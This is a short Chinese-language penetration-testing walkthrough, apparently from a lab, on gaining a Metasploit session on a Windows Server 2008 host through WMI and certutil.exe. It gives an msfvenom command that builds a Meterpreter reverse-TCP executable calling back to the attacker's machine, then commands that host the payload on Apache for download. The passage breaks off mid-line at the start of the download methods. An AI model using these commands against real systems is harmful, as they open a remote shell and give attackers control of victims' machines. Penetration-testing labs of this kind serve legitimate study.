WMI命令执行与Certutil.exe上线msf
1、 测试环境
攻击机Kali:192.168.11.131
靶机Server2008:192.168.11.133 (135端口默认开启)
2、 Payload下载
2.1 生成Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.131 LPORT=4444 -f exe > msf.exe
2.2 搭建下载环境
启动Kali Apache 服务,将生成的exe放到Apache 默认目录下,尝试访问正常弹出下载框
service apache2 start
mv msf.exe /var/www/html/
2.3 下载Payload
方法一:powershell下载
cscript.